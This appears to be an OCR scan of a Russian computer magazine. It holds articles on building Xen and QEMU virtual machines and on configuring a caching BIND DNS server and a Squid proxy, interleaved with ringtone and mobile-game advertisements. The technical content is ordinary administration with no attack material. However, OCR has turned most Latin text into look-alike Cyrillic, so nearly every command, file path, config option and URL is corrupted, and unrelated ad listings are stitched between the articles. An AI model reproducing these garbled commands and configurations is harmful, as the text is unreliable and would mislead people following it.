Конечно, не обошлось и без подводных 
камней (вспоминается аксиома: «За все 
нужно платить»). Перечислю несколько 
ограничений, которые Хеп накладывает на 
пользователя: 

1 Для работы операционной системы в вир- 
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Сегодня в состав любого популярного дистрибутива Ыпих по умолчанию входит Хѳп, 



туальной машине Хеп необходимо выпол- 
нить одно из следующих условий : наложить 
на ядро ОС специальный патч, который 
адаптирует ее к виртуальной машине (на 
данный момент патчи доступны для І_іпих, 
ІМеіВЗО и РгееВЗО), либо купить процессор, 
поддерживающий технологию виртуализа- 
ции (ѴТ от ІпіеІ или РасіТіса от АІѴЮ), тогда 
внутри виртуальной машины можно будет 
запустить хоть ѴѴіпбоѵѵз ХР. 

2 Все ОС, запускаемые внутри виртуаль- 
ной машины, не могут иметь общих раз- 
делов (во избежание порчи файловой 
системы) и должны использовать заранее 
выделенный для них участок оперативной 
памяти (всю имеющуюся оперативку нуж- 
но разделить на количество работающих 
ОС). Также понадобится отдельный своп 
для каждой гостевой ОС. 

3 Хеп не умеет разделять видеокарту меж- 
ду виртуальными машинами (я плохо пред- 
ставляю себе, как это вообще можно реа- 
лизовать), поэтому придется поднимать на 
гостевой ОС ѴЫС или использовать сетевой 
доступ к Х-ѴѴіпбоѵѵ. 

4 Драйвера пѵібіа отказываются 
работать в Хеп. 

Разводим питомник 

Как плацдарм для наших экспериментов 
будем использовать Ыпих. В таких дистри- 



бутивах, как Ребога Соге, ОеЬіап или ЗиЗе, 
установить Хеп можно, как обычный софт, 
используя стандартные средства (грт, арі- 
деі) — мы не будем рассматривать этот спо- 
соб. А лучше скачаем и скомпилируем его 
своими руками (пользователям ЗІаскѵѵаге — 
привет). Сливаем тарболл отсюда: 
ѵѵѵѵѵѵ.сІ.сат.ас.ик/ВезеагсЬ/ЗРіО/пеІоз/хеп/ 
боѵѵпІоабз/хеп-З.О-ІезІіпа-згс.Іаг . распако- 
вываем в каталог /изг/згс (рекомендую все 
делать в этом каталоге) и переходим в но- 
вообразованный каталог /изг/згс/хеп-3.0- 
іезііпд. Для каждого ядра доступны патчи 
«Із раІсЬез». Мне достался Хеп с патчами 
для версии 2.6.12. Берем тарболл Ііпих- 
2.6.12.1аг.Ь72 и помещаем в корень текуще- 
го каталога (если ты собрался выкачивать 
ядро из инета, то не торопись — установ- 
щик сделает это сам). Теперь действуем 
следующим образом: 

#таке 
#таке іпзіаіі 

Так мы соберем два ядра для Хеп с де- 
фолтными конфигами и разместим их в 
каталоге /Ьооі. Образ ядра с окончанием 
«-хепО» — это супервизор, стандартное 
ядро с активированной поддержкой Хеп и 
стандартным набором драйверов. Это ядро 
мы будем использовать вместо ядра, уста- 



новленного в твоем дистрибутиве в данный 
момент. Второй образ, имеющий окончание 
«-хепіі» — ядро, которое следует использо- 
вать в гостевых ОС (точнее дистрибутивах 
Ыпих), а драйвера, непосредственно ра- 
ботающие с железом, в нем заменены про- 
слойкой эмуляции. 

Для сборки собственного ядра для Хеп 
необходимо выполнить ряд операций. В 
первую очередь запускаем конфигуратор 
ядра-супервизора: 

#сб Ііпих-2.6.12-хеп0 

# таке АНСН=хеп теписопЛд 

Конфигурируем в соответствии со своими 
потребностями, не забыв включить опции: 

ХЕІ\І -> Ргіѵііедеб ОиезІ (ботаіп 0) 

ХЕІ4 -> ВІоск-беѵісе Ьаскепб бгіѵег 
ХЕЫ -> Ыеіѵѵогк-беѵісе Ьаскепб бгіѵег 
ХЕІ\І -> ВІоск-беѵісе (гопіепб бгіѵег 
ХЕЫ -> І\ІеІѵѵогк-беѵісе(гоп{епб бгіѵег 
ХЕЫ -> ЗсгиЬ тетогу ЬеЕэге (гееіпд і{ Іо Хеп 

Теперь запускаем конфигуратор ядра гос- 
тевой ОС: 

#сб . ./Ііпих-2.6. 1 2-хепІб 

# таке АНСН=хеп теписопЯд 

Делаем то же самое, за одним исключени- 



/3/ 



/3/ хіегт 

иЬипШ Ііпих 
в окнехіегт 

/4/ дети 
батпзтаІІ 
Ііпих в дети 
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ѳм: опции «ХЕІ\І -> РгіѵіІедесІ Оиезі (сіотаіп 
0)» и «ХЕІМ -> РНузісаІ сіѳѵісѳ ассѳзз» в этом 
ядро совѳршѳнно бесполезны. И наконец 
собираем и устанавливаем ядра: 

# ССІ . . 

#таке 
#таке іпзіаіі 

Этапустановки пройден, приступаем к кон- 
фигурированию. Для начала необходимо 
скопировать модули ядрахепіі в корневую 
файловую систему гостевой ОС (допустим, 
она расположена на Иба2): 

#ткбіг/тпУдиез{ 

# тоип{ /беѵ/ИсІа2 /тпі/диезі 

# ср -а /ІіЬ/тобиІез/2.6. 1 2.6-хепЦІ /тпІ/диезІ/ІіЬ/ 
тобиіез 

Осталось настроить дгиЬ (І_іІо не поддержи- 
вается) для загрузки самого Хеп и ядра-су- 
первизора. Открываем /ЬооІ/дгиЬ/тепи.Ізі 
и добавляем в него следующую запись: 

#ѵі/ЬооІ/дгиЬ/тепи.Із{ 

ШІеХелЫпих 

# раздел с каталогом /Ьооі 
гооІфсІО.О) 

# грузим Хеп 

кегпеі /ЬооѴхеп-З.О.дг бот0_тет=1 31 072 



# и ядро-супервизор 

тосіиіе /ЬооУѵтІіпиг-2.6. 1 2-хепО гоо!=/сІеѵ/Іп 

баі го сопзоІе=ДуО 

Здесь я предположил, что корень фай- 
ловой системы твоего текущего Линукса 
находится на Нсіаі. Аргумент бот0_тет 
указывает на количество памяти (в кило- 
байтах), доступной ОС, работающей в 
качестве супервизора. Сколько отводить 
памяти, решай сам. Я обычно указываю 
половину от ее физического объема — ос- 
тальное достанется гостевым ОС. Все, за- 
кончили. Теперь отправляй машину на пе- 
резагрузку, выбирай пункт ХепЫпих в меню 
дгиЬ и приготовься читать дальше :). 

Пингвин внутри пингвина 

Парадоксально, но Хеп, при всей своей 
сложности, на удивление легок в адми- 
нистрировании. Чтобы обучиться основам 
работы с Хеп, можно вообще не читать до- 
кументации. 

Рассмотрим пример запуска дистрибутива 
ІІЬипІи І_іпих внутри виртуальной машины 
Хеп. Для осуществления задуманного нам 
нужен сам дистрибутив ІІІоипШ, установ- 
ленный на жесткий диск (в данном случае 
на раздел / беѵ/Ма2 ), конфигурационный 
файл и немного знаний о І_іпих. В качестве 
примера для конфига возьмем файл /еіс/ 



хеп/хтехатріеі , скопируем его в /еіс/хеп/ 
иЬипіи и немного подправим: 

#ѵі/еІс/хеп/иЬипШ 

# наше ядро для гостевой ОС 
кегпеі = “/ЬооѴѵтІіпи2-2.6.12-хепи” 

# отводим 64 Мб оперативной памяти 
ітетогу = 64 

# имя может быть любым 
пате = “иЬипЩ” 

# эмулируем одну сетевую карту 
пісз = 1 

# мак-адрес и ІР-адрес 
ѵі^=[‘тас=(е:!сІ:00:00:00:11,ір=10.0.0.Г] 

# гостевая ОС будет видеть только два раздела 

# диска (здесь /бе ѵ/Ма2 — корень, а /сіеѵ/МаЗ 

# — своп) 

сіізк = [ ‘рНу:Ілба2,Іпба2,ѵѵ’, ‘рНу:ІябаЗ,ІпбаЗ,ѵѵ’ ] 

# указываем корневой раздел 
гооі = “/сІеѵ/Ііба2 го” 

# параметры, передаваемые ядру (указываем 

# только уровень инициализации для іпіі) 
ехіга = “3” 

Теперь нужно снова примонтировать раз- 
дел с ІІІоипІи (/ с!еѵ/ІісІа2 ) и отредактировать 
соответствующим образом его конфиг 
/еІс/ізІаЬ. Дело осталось за малым. Наби- 
раем команду «хт сгеаіе иЬипіи -с» и по- 
лучаем доступ к первой консоли ІІЬипШ, на 
которой можно наблюдать загрузку ядра 
и инициализацию, а затем и приглашение 
к регистрации в системе. Обратно в хіегт 
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/5/ дети 
снова сіатпзтаіі 
Ііпих 





выходим через комбинацию <СігІ+]>, воз- 
вращаемся в ІІЬипіи с помощью команды 
«хт сопзоіе иЬипІи». 

Реактивный яети 

С моей стороны было бы преступлением не 
рассказать про эмулятор ПК дети, одно из 
главных достоинств которого — высокая 
скорость эмуляции. Автор дети, Фабрис 
Беллард (РаЬгісе ВеІІагб), — человек очень 
компетентный в данном вопросе. Он даже 
выложил на своем сайте документ, где 
поделился секретами оптимизации кода 
эмуляции. Вторая отличительная черта 
дети — возможность работы в двух режи- 
мах: режиме эмуляции всего ПК и режиме 
эмуляции процессора. Первый режим поз- 
воляет запускать операционные системы 
внутри эмулятора, а второй — исполнять 
бинарные файлы на процессоре иной ар- 
хитектуры. Например, с помощью дети 
можно запустить бинарник от РоѵѵегРС на 
обычном Пентиуме. Сейчас дети подде- 
рживает эмуляцию процессоров архитек- 
туры х86, АРМ, ЗРАРС, РоѵѵегРС и МІРЗ. 
Сам эмулятор может работать на множес- 
тве архитектур, в операционных системах 
семейства ІІІМІХ, ѴѴіпбоѵѵз и МасОЗ X. 
Относительно недавно разработчик вы- 
ложил на своем сайте ( іаЬгісе.ЬеІІагбТгее. 
1т) модуль ядра І_іпих — кдети, превра- 
щающий дети в настоящую виртуальную 
машину (двоичный код теперь исполняет- 
ся не виртуальным процессором, а физи- 
ческим). Код модуля не доступен, и автор 
его не раскроет, пока не получит матери- 
альной поддержки. Однако энтузиасты из 
ореп зоигсе-сообщества время даром не 
теряли и уже выпустили аІрНа-версию аль- 
тернативного модуля дѵт86 ( ѵѵѵѵѵѵ.дѵт86. 
ощ), бинарно совместимого с кдети. 
Текущая версия дети (0.8) воссоздает 
следующую аппаратную конфигурацию: 
чипсет І440, видеокарта Сіггиз СБОЮ 5446, 
мышь и клавиатура с интерфейсом РЗ/2, 



сетевая карта ЫЕ2000, звуковая карта 
Сгеаііѵе ЗоипбВІазІег 1 6. Кроме того, дети 
эмулирует последовательные, параллель- 
ные, БІЗВ-порты и поддерживает ЗМР, 
вплоть до 255-ти процессоров. 

Пожалуйте в виртуальный мир 

Настало время опробовать дети в деле. 
Скачиваем последнюю версию дети и 
кдети с официальной странички ( ІаЬгісе. 
ЬеІІагбТгее.іг/дети Г распаковываем архив 
дети-0. 8. ОТаг.дг в каталог /Ітр, а кдети- 
0.7.2.іаг.д2 — в новообразованный /Ітр/ 
рети-0.8.0. В нем набираем, ставшие уже 
классическими, команды: «./сопіідиге && 
таке && таке іпзіаіі». Инсталлятор уста- 
новит бинарник дети и сопутствующие 
файлы, а также поместит модуль кдети в 
/ІіЬ/тосІиІез. Для работы кдети требует до- 
ступ кітріз, поэтому в /еіс/ШаЬ необходи- 
мо добавить строку «Ітріз /беѵ/збт Ітріз 
беіаиііз 00», выполнить команду «тоипі-а» 
и подгрузить модуль: «гтюбргоЬе кдети». 
Теперь на примере установки некой абс- 
трактной ОС рассмотрим возможности 
дети. Для начала нам нужно создать вир- 
туальный жесткий диск. Это можно сделать 
двумя способами: командой бб заполнить 
файл нулями, взятыми из /деѵ/гего, либо 
командой дети-ітд. Второй способ более 
правильный и простой — его и рассмотрим. 
Создадим винт размером 1 Гб: 

# дети-ітд сгеаіе сіізк.ітд 1 С 

Также нам необходим 150-образ, содер- 
жащий инсталлятор ОС (его легко извлечь 
с компакт-диска: «бб іІ=/беѵ/сбгот о!=сб. 
ізо сопѵ=поеггог»). Теперь запускаем дети 
такой командой: 

# дети Фба сіізк.ітд -сбгот сб.ізо\ 

-Ьооіб-топііогзібіо 

Аргумент ‘-Иба’ задает наш виртуальный 



винт, ‘-сбгот’ указывает на образ компакт- 
диска, ‘-Ьооі б’ — на загрузку с компакт- 
диска (возможен один из трех вариантов: 
'а 1 , 'Ь' или 'с', то есть флопик, жесткий диск 
или СО-ПОМ), ‘-топііог зібіо’ предоставля- 
ет доступ к управляющей консоли дети. 
Если все сделано правильно, то должно 
открыться окно дети, в котором начнется 
загрузка инсталлятора ОС (или самой ОС, 
если это иѵеСЭ). Ну, а далее следует уста- 
новить ОС обычным способом. Если опе- 
рационка попросит второй установочный 
диск, то его легко подсунуть, набрав две 
команды в консоли дети: 

>еіес1 сбгот 
> сНапде сбгот сб2.ізо 

По окончании установки перезапускаем 
дети командой и радуемся новой ОС: 

# дети -Мба бізк.ітд -топіЮг зібіо 

Кстати, можно обойтись и без образа жес- 
ткого диска, указав реальный: 

# дети -Мба /беѵ/ііба -топіЮг зібіо 

Но я бы не рекомендовал так делать: рис- 
куешь разрушить файловую систему. При 
острой необходимости лучше использо- 
вать другую команду: 

# дети -зпарзИоІ /беѵфба -топіЮг зібіо 

Так данные будут записываться не на ре- 
альный диск, а во временный файл. 

К сожалению, в рамках данной статьи не- 
реально раскрыть всех возможностей дети, 
таких как организация сетевого соединения, 
встроенный ЗМВ-сервер, запуск бинарных 
файлов других архитектур или сохранение 
состояния виртуальной машины. 
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Ниасилил, патамушта букавак многа Сижу за решеткой в темнице сырой... 48855700 
Командир, к вам гонец с сообщением... Бросайте школу, она не товарищ... 47938700 
Внимание, в нас попали боевой СМСкой... Телефонная истерика сматами... 48627700 
Вставай, пока тебя девушка не застукала! Улыбайся, завтра будет хуже... 48205700 
Йоу, чувак, звонит твоя трубка (КпВ - шіх) Помогите! Помогите, помогите! 48873700 
Шеф, аллё! Это я - мобильник (пар. Папанов) Просыпайся, телки ждут! 47026700 
Накурился в хлам и набаянил тебе эсэмэску Кросавчег, бири трубко! 48784700 
Эй, люди! Гляньте на мою хозяйку. Сам тащусь! Баяннн, но свежий 48781700 
Век воли не видать, братан, ответь за все! (бандито) Полоскание горла 4825 1 700 
Все умолкли! Хозяин с президентом базарить будет! Дикий смех 49090700 
Просыпайся, животное! Поезд на Бобруйск уже подан! Шимпанзе 48232700 
Стоять бояться. Кто такие? Сколько лет? Почему не в армии? Петух 49206700 
Эй ты, корова! Бегом на зарядку! Думаешь, похудела во сне? Лев 49 7 97700 



ПОЛИФОНИЯ 



48705700 7Б- Осень Спят усталые игрушки (к ТВ передаче Спокойной ночи, малыши) 46767700 
47386700 Лпдіе ЬеІІБ Ц Валерий Меладзе и ВИА ГРА - Притяженья больше нет 48390700 



* 

Ж 



Ыаидітіу ргоТеззог 

Озорной Профессор известен 
своим ужасным отношением к 
детям. Он незаслуженно оста- 
вил 2х девочек - Мону и Кели 
- после уроков на дополнитель- 
ные занятия. Помоги Озорному 
Профессору подкупить девочек, 
чтобы о случившемся не узнал 
директор школы! 




12091700 



Трансформер 

Ощути себя настоящим транс- 
формером с электронным 
интеллектом, мощным оружием 
и способностью изменять форму 
в воде, на суше и воздухе. Перед 
твоими глазами разворачивают- 
ся бои за выживание роботов. 
Твоя задача быть совершенным 
механизмом в боях с подобными. 



5.Т.А.В. 

Новая потрясающая стрелялка 
с очень красивой графикой. 

В 2008 году под предлогом 
восстановления демократии 
вероятный противник пытает- 
ся скрытно высадить десант 
на Российской границе. Ты 
- командир подразделения на 
данном участке. 




11693700 



Огасиіа 

Трёхмерный лабиринт по мо- 
тивам книги. Вам предстоит 
выбраться из замка знамени- 
того графа Дракулы, мирные 
обитатели которого каждую 
ночь превращаются в крово- 
жадных вампиров. Мало убить 
самого вампира, для победы 
необходимо уничтожить гроб. 



5Іоі МасЫпе 

Все как в стандартном 
“одноруком бандите”. 
Дергаешь ручку, вращаются 
панельки. Ты можешь выбрать 
3 варианта - сделать свою 
ставку, ва-банк, или дернуть 
ручку еще раз. 




11908700 




ѴѴогІсіз сіеасШезі зіипіз 

Добро пожаловать в «Мировые 
Смертельные Трюки» ... это 

- когда полет настолько высо- 
кий, что кровь стынет, глазные 
яблоки вот-вот выскочат, 
волосы - дыбом стоят, нервы 

- на пределе, сердце - готово 
разорваться в любой момент, 
суставы - хрустят, ...это риск! 




47122700 К-Маго - Сгагу 
49288700 Каста -Сестра 
47137700 5та$Н- Мечта 
49289700 Звери - Для тебя 
49286700 Массква - 7 этаж 
46571700 Э-Ріѵе -Ріпсіаѵѵау 
47176700 Земфира - Искала V) 
49218700 Глюк'Оіа - Москва 
47425700 Чичерина- Тулу ла 
49223700 І.А.Т.и.-АІІ АЬоиІ № 

487 1 4700 Жасмин - Дольче вита 
48828700 1.05 сіеі Кіо - Масагепа 
49110700 Раіп-5НиІуоигтоиіН 
47658700 Виа Гра - Бриллианты 
492 1 5700 Серега - Король ринга 
48425700 Народная - Цыганочка 
47321700 Катя Лель -Муси-Пуси 
49224700 Банда - Плачут небеса 
4870 1 700 Тотал - Бьёт по глазам 
48721700 Би-2 -Скользкие улицы 
49111 700 Тема из к/ф Веѵегіу МІІ5 
49276700 ита2гшаН - Ума Турман 
49214700 Братья Гримм - Ресницы 
48724700 Дискотека Авария - Небо 
47688700 Жанна Фриске-Лала ла 
49209700 Ирина Дубцова - Медали 



В.Бутусов и гр. Ю-Питер - Девушка по городу идет 484 1 7700 
Если б я был султан из к/ф "Кавказская пленница" 48725700 
щО Николай Басков и Таисия Повалий - Отпусти меня 49212700 
Прекрасное далеко (из к/ф Гостья из будущего) 47134700 
Тошэ5 И'еѵегдгееп - Біпсе уои'ѵе Ьееп доле 4911 3700 
Пусть бегут неуклюже (из м/ф Чебурашка) 46758700 
Дима Билан - Я так люблю тебя (ремикс) 48553700 
0^} Мария Ржевская - Когда я стану кошкой 48500700 
Кристина Орбакайте - Перелетная птица 49208700 
Ага$И и Блестящие - Восточные сказки 489 1 1 700 
Андрей Губин и Краски - Те кто любит 47422700 
Ночные Снайперы - Катастрофически 473 1 4700 
Дюна - Привет с большого бодуна 47684700 
0^ .Іікііп ТігпЬегІаке - Сгу те а гіѵег 48883700 
Мультфильмы - За нами следят 473 12700 
Максим Фадеев - Беги по небу 47304700 
Гости из будущего - Ты где-то 492 1 6700 
Чай вдвоем - День рожденья 47689700 
Другие правила -Лети! Беги! 47142700 
Блестящие - За четыре моря 48723700 
Агеепіит - І.оѵе те. . .Іоѵе те. . . 46572700 
БидаЬаЬез - Ноіе іп (Не ИеасІ 49108700 
0.1 Грув - Служебный роман 48718700 
Непара - Бог тебя выдумал 47305700 
Пропаганда - Кванто коста 48703700 
Лазарев - Еуе оГ Ше 5Іогт 49293700 



МРЗ 



49259700 Каста - Сестра Кристина Орбакайте - Перелетная птица 49254700 

49238700 Звери - Для тебя АйдамирМугу и Аслан Тлебзу- Черные глаза 46561700 

Ѵепдегоѵ & РебогоРР- Кавказская пленница 48430700 
[«^ Ленинград - Тема дороги( из к/ф Бумер 2) 49123700 
Ага5Іі и Блестящие - Восточная сказка 48878700 
Подъем и Карина - Белые кораблики 49255700 
Чугунный Скороход - Реалити - Шоу 48818700 



12105700 
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Заѵа-приложение «ЗоІІу.ги» 
избавляет вас от утоми- 
тельной необходимости 
каждый раз вводить код- 
идентификатор покупки 
(например, игры или мело- 
дии) и отправлять его 
при ПОМОЩИ 5ПЛ5. 



46580700 Аѵепіига - 1 Ьеііѵе 
49219700 Би 2 -Фламенко 
48109700 Апп І.ее - 2 Ііте5 
48494700 МкоТт - Щекотка 
46557700 Серёга - Кіпд гіпд 
48760700 Фактор 2 - Шалава 
48733700 Ілітеп- Не спеши 
47445700 Слава - Попутчица 
4929 1 700 А Студио - Улетаю 
У 48116700 Іп-Сгіб - Мата тіа 
4925 1 700 Гл юк':) 2 а - Москва 
49292700 ІІта2гтаН - Скажи 
46545700 .І-Ріѵе-РіпсІАѴѴау 
4930 1 700 Бизюлька - Сереня 
48680700 Руки вверх - Отель 
4744 1 700 Ні Рі - Глупые люди 
48793700 Другие правила - Лето 
48812700 Катя Чехова - Холодно 
48737700 Елка - Девочка в Пежо 
49269700 Ирина Дубцова -0 нем 
49253700 Массква - Ну наконец-то 
49272700 Полина Гагарина - Я твоя 
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Смысловые галлюцинации - Полюса 4922 1 700 
Гости из будущего - Лучшее в тебе 49244700 
Тгіріех ѵ$ Аросаіірііса - Бой с тенью 47439700 
Юлия Савичева - Прости за любовь 4863 1 700 
ВИА Чаппа Реаі Михей - По волнам 48740700 
КеРІех - Я тебя всегда буду ждать 47456700 
(нп^ ВепаББІ Вго5. - Еѵегу Біпдіе Рау 48726700 
Валерий Меладзе - Иностранец 49247700 
Меіапіе С - №хР Ье$Р БіірегзРаг 47363700 
СІоЬаІ РееіауБ - ѴѴІіаР а Рееііпд 46543700 
0 Аг5епіит- Іоѵе Ме... Іоѵе Ме... 46578700 
Дискотека Авария - ХХХиРНР 49246700 
Жанна Фриске - Где-то летом 49243700 

■ Многоточие - Сквозь печаль 48674700 
РЛ Грув - Служебный роман 49260700 
Рарі 5апсЬе2 - Епатогате 46550700 
Братья Гримм - Кустурица 48692700 
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Проверь совместимость своего телефона и объекта на ѵѵар.іоііу.ги/сосіе 
Отправь 5М5 с кодом цветной картинки, анимации, реалтона или мелодии 
на номер 3120, игры на номер 3130, видео на номер 3130 
Стоимость 5М5: для 3120 - 29,7 руб.; для 3130 - 60 руб. без НДС. 

При загрузке любого типа мобильного контента 
вы бесплатно получаете ссылку на .Іаѵа-приложение «.ІоІІу.ги» \ 

Точную рублевую стоимость уточняй у оператора. 




Скидка до 50% при оплате картой "Евросеть-контент" 
по телефону 8 (495) 980-44-87, на сайтах ѵѵар.іоііу.ги, ѵшѵфііу.ги, 
терминалах мобильного контента 
Внимание! Требуется настройка ѴѴАР/СРК5. 

В случае ошибочного запроса услуга считается оказанной! 

Служба поддержки: 8 (495) 786-65-87. 

Операторы: МТС, Билайн, Мегафон, СМАРТС (Самара, Астрахань, Волгоград), МОТИВ, НСС 
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КОЛИСНИЧЕНКО ДЕНИС 

/ 0Н5ІІ_АВ5@М АІІ..ПІІ / 



СІпіхоісі / 02 

Экономим 
деньги 
с туксом 

Эффективная настройка 
кэширующего РЫ5- и Ргоху-сервера 




СЭКОНОМИЛ — ЗНАЧИТ ЗАРАБОТАЛ. НЕДАРОМ СУЩЕСТВУЮТ СПЕЦИАЛИСТЫ, 
КОТОРЫЕ ЦЕЛЫМИ ДНЯМИ ТОЛЬКО И ДУМАЮТ, ГДЕ И НА ЧЕМ МОЖНО СЭКОНО- 
МИТЬ. Я ПРЕДЛАГАЮ ТЕБЕ НАЧАТЬ ЭКОНОМИТЬ С ПОМОЩЬЮ ЫШХ. НЕТ, МЫ 
НЕ БУДЕМ ДОЛГО И СКУЧНО ДИСКУТИРОВАТЬ НА СЧЕТ ОРІ_ И О ТОМ, ЧТО МОЖ- 
НО СНЕСТИ ѴѴІИЭОѴѴЗ И ВМЕСТО НЕГО ПОСТАВИТЬ І_ІІ\ІЦХ. СЕГОДНЯ МЫ ПОГО- 
ВОРИМ О «ПРАКТИЧЕСКОЙ ЭКОНОМИИ». 



Практическая экономия 

Практическая — потому что экономить мы 
будем, применяя свои знания и умения на 
практике, а не в теории. А экономить есть 
на чем. Мы можем установить кэширующий 
0145-сервер для ускорения выполнения 
0148-запросов, кэширующий прокси-сер- 
вер, чтобы существенно сэкономить на 
трафике, а также МТр-редиректор, который 
позволит нам фильтровать контент и забыть 
о рекламных баннерах. Для реализации вы- 
шеперечисленного совсем не обязательно 
иметь компьютер с выделенной линией — и 
0148, и прокси будут отлично работать на 
одной обычной домашней машине, под- 
ключенной к Интернету с помощью модема. 
Причем эти сервисы будут не просто рабо- 
тать, а реально экономить твои деньги. 

Кэширующий ОЫ$-сервер 

Установка кэширующего 0143-сервера поз- 
воляетсократить время разрешения домен- 
ных имен, а также немного сэкономить на 
трафике (порядка 5 — 7%). В подавляющем 
большинстве дистрибутивов он присутству- 



ет по умолчанию, поэтому сразу перейдем 
к его настройке. Создадим основной файл 
конфигурации демона патесі. 

#ѵі /ѳіс/патѳсі.сопі 

ор(іопз{ 

// рабочая директория 
бігесіогу “/ѵаг/патесі”; 

// все запросы будут переадресованы 
// 0143-серверу провайдера 1 92. 1 68.99. 1 , 

//если с этим сервером возникнут проблемы, 
//то локальный сервер будет искать ответ в 
//кэше или самостоятельно выполнит запрос 
(огѵѵагсі (ігз(; 

Тогѵѵагсіегз { 1 92. 1 68.99. 1 ; }; 

}; 

// эта запись нужна для того, чтобы патесі не 
//ругался на отсутствие ключа гпбс.кеу 

сопігоіз {}; 

//зона «.» не поддерживается нашим сервером; 
//тип ГііпІ означает, что в файле патесі. са 
// находится подсказка о том, где искать 
// корневые серверы 0145 



гопе іп { 

(уре ЫпЦ 
(Не “патеб.са”; 

}; 

//зона 0.0.1 27. іп-асісіг.агра — это локальная 
// зона, она описана в файле патесі. ІосаІ 
гопе “0.0.1 27. іп-аббг.агра” іп { 

(уре таз(ег; 

(Не “патесі. ІосаІ”; 

}; 

Параметр (огѵѵагсі может принимать одно 
из двух следующих значений: «опіу» — наш 
0148-сервер, никогда не должен предпри- 
нимать попыток обработать запрос само- 
стоятельно; «(ігзі* — наш сервер, должен 
сам пытаться обработать запрос, если от 
указанных в перечислении 0145-серверов 
провайдера не был получен соответствую- 
щий ответ. 

Параметр (огѵѵагсіегз задает заключенный в 
фигурные скобки список ІР-адресов ОІЧЗ- 
серверов, которым наш 0145-сервер будет 
переадресовывать запросы вместо того, 
чтобы отвечать на них самому. ІР-адреса 
перечисляются через точку с запятой. 
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/1/ ЬіпсІ 

установка ЬіпсІ 
с помощью гртсігаке 
в Мапсігаке 

/2/ КѴѴгіІе 

редактирование файла 
/еіс/патед.сопі 

/3/ патесі 

запущен и работает 



Кроме того, каталог /ѵаг/патесі должен 
содержать еще два файла: патесі. са (ин- 
сталлируется при установке пакета ЬіпсІ) и 
патесі. ІосаІ. Второй файл, чтобы не созда- 
вать его вручную, можно взять в каталоге/ 
изг/зІіаге/сІос/ЬіпсІ-9.2.3/сІІіср-сІупатіс-сІп8- 
ехатрІез/ЫпсІ/ѵаг/патесІ. 

Теперь запустим патесі: 

# патесі 

Проверим, работаетли он: 

# рз -ах I дгер патесі 

Данная команда выводит список процессов 



с именем патесі — твой патесі должен быть 
в списке. Чтобы убедиться в том , что сервер 
запущен без каких-либо ошибок или пре- 
дупреждений, выполняем: 

# ІаіІ /ѵаг/Іод/теззадез 

Теперь осталось в файле /еіс/гезоіѵ.сопі 
прописать наш домен и ІР-адрес интерфей- 
са обратной петли: 

#ѵі/е1с/гезоІѵ.соп( 
ботаіп туботаіп.ги 
патезегѵег 127.0.0.1 

Конечно, настройка сервера на этом не за- 



канчивается. Например, можно прописать, 
какие клиенты имеют право использовать 
сервер, а какие — нет. Но основная зада- 
ча, то есть создание кэширующего ОІЧЗ- 
сервера, выполнена. Нужно отметить, что 
подобный сервер эффективен не только в 
локальной сети, но и если ты используешь 
свой компьютер в гордом одиночестве, сай- 
ты начнут открываться чуточку быстрее, 
поскольку патесі запущен на локальном 
компьютере. 

Кэширующий прокси-сервер 

С помощью прокси-сервера ЗциІсІ можно кэ- 
шировать ѵѵѵѵѵѵ-трафик, блокировать банне- 
ры, определять, какие файлы разрешается 
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КОММЕНТАРИЙ РЕДАКТОРА / АНДРЕЙ МАТВЕЕВ / 



Я уже давно применяю 
сіпз/іііір-кэширование и дома, 
и на работе. Моя конфигура- 
ция практически идентична 
изложенной в этой статье, 
только я запускаю сервисы от 
имени непривилегированного 
пользователя (патесі и _здиісІ) 
и делаю ставку на прозрач- 
ное Ийр-проксирование, при 
использовании которого нет 
необходимости указывать 
адрес и порт прокси-сервера 
в настройках браузеров на 
клиентских компьютерах. Для 



работы в этом режиме ЗдиісІ 
необходимо собрать с подде- 
ржкой штатного файрвола, 
плюс в главном конфигураци- 
онном файле ЗдиісІ должны 
присутствовать следующие 
записи: 

# ѵі /еІо/зриісІ/зриісІ.сопТ 

Мр_рогМ 27.0.0. 1:31 28 
ИДрсІ_ассеІ_Но5і ѵігіиаі 
ИДрсІ_ассеІ_рог180 
ИДрсІ_ассеІ_ѵѵШп_ргоху оп 
ЫІрб_ассеІ_изез_Но5ЦіеасІег оп 



В ядре ОрепВЗй я нашел и 
исправил забавный баг, кото- 
рый не позволял использовать 
ограниченные права доступа 
для псевдоустройства рД4). 
Теперь, начиная с ОрепВЗй 
3.9, возможна более секурная 
конфигурация: для успешно- 
го выполнения системного 
вызова іосІІ(2) с операцией 
ОЮСІМАТЕООК (просмотр 
состояния соединений) доста- 
точно, чтобы непривилегиро- 
ванный пользователь _здиісІ 
из группы _здиіб обладал 



правами «только на чтение» 
для /бе ѵ/рі (раньше требова- 
лись права как на чтение, так и 
назапись): 

# сіідгр _здиісІ /беѵ/р{ 

#сНтосІ д+г/сІеѵ/р{ 

Более подробную информа- 
цию по настройке транспарен- 
тной прокси в ОрепВЗБ можно 
найти здесь: ѵѵѵѵѵѵ.орепЬзсІ. 
ги/сІосз/зіерз/здиісШт І 



скачивать пользователям, а какие — нет, ука- 
зывать максимальный объем передаваемого 
объекта и даже ограничивать пропускную 
способность пользователей определенного 
класса. Как ты уже понял, детальное конфи- 
гурирование ЗдиісІ — это тема для отдельной 
статьи, здесь мы рассмотрим только перво- 
начальную настройку прокси сервера. Но 
даже после проведения базового тюнинга ты 
получишь реальную экономию трафика (по- 
рядка 20 — 25%). 

Предположим, что у нас есть небольшая 
сеть, скажем, на 10-ти компьютерах. При- 
нципиальной разницы нет, но количество 
компьютеров нужно учитывать при вычис- 
лении объема выделяемой памяти и разме- 
ракэшаЗдиісІ. Для 10-ти компьютеров впол- 
не хватит 1 Гб кэша: получается по 100 Мб 
на один компьютер. Такое значение более 
чем достаточно. Например, по умолчанию 
та же Опера использует 10 Мб, что вполне 
достаточно для обычного пользователя. А 
100 Мб хватит для требовательного пользо- 
вателя, проводящего в паутине очень много 
времени. 

ЗдиісІ не сложен в настройке (во всяком 
случае, не сложнее АрасИе и подобных се- 
тевых сервисов). Установи пакеты ЗдиісІ и 
здиісЮиагсІ. Первый пакет содержит сам 
прокси-сервер, а во втором находится ре- 
директор здиісЮиагсІ, выполняющий следу- 
ющие функции: 

• ограничение доступа пользователей; 

• блокирование ЕІРБ, внесенное 

в черный список, например сайты 
с контентом «для взрослых»; 

• ограничение доступа к ЕІПБ 

на основе регулярных выражений; 

• замена баннеров пустыми картинками; 

• различные правила доступа 
для разных групп пользователей, 
для определенного времени суток, 
дня недели, даты и т.д. 

Сейчас приступим к редактированию 
